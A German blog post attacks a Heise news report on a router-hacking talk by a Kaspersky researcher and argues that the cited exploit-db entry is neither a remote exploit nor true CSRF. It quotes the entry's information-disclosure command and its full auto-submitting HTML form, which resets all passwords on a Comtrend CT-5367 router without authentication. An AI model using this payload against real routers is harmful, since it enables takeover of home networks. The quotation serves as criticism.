Remote Exploit via 192.168.1.1
Heise berichtet mit der Überschrift "4,5 Millionen Router gehackt" über einen Vortrag von einem Snakeoil-Vertreter namens Fabio Assolini über einen remote exploit mit denen Hacker 4.5 Millionen Router in Brasilien gehackt haben wollen.
Netterweise verlinkt Heise auf die exploit-db, die sie so verlinken:
Dafür haben sie mittels zweier Bash-Scripte per Cross Site Request Forgery (CSRF) zunächst das Administrator-Passwort geändert und im zweiten Schritt den DNS-Server-Eintrag im Router manipuliert.
Ich bin dem Link gefolgt und fand dort erstens überhaupt kein Bash-Script und von "remote" ist dort auch nichts zu sehen, sondern sowas hier:
root@linux:~# get.pl http://192.168.1.1/password.cgi ## Information Disclosure
Das sieht jetzt eher nicht nach remote Exploit aus. Dann ändern die "Hacker" die Routerpasswörter mit:
[CUT EXPLOIT HERE] ## CSRF For Change All passwords <html> <head></head> <title>COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Change All passwords</title> <body onLoad=javascript:document.form.submit()> <form action="http://192.168.1.1/password.cgi"; method="POST" name="form"> <!-- Change default system Passwords to "shpek" without authentication and verification --> <input type="hidden" name="sptPassword" value="shpek"> <input type="hidden" name="usrPassword" value="shpek"> <input type="hidden" name="sysPassword" value="shpek"> </form> </body> </html> [CUT EXPLOIT HERE]
Das sieht jetzt eher auch nicht nach Cross Site Request Forgery aus, sondern eher nach einem simplen HTT Post Request, mit dem man einfach die Passwörter bei dem Router ändern kann ohne authentisiert zu sein.
Es ist ja schlimm genug, wenn sich solche Trolle heutzutage Hacker nennen dürfen, noch schlimmer ist, wenn die solchen Bockmist in eine exploit-db publiziert kriegen, und noch viel schlimmer, dass ein Kaspersky Mann das auch noch in einem Vortrag erwähnt. Aber, dass Heise.de darüber berichtet (oder abschreibt?!) ohne irgendwelche Details nachzuprüfen, ist eine Katastrophe.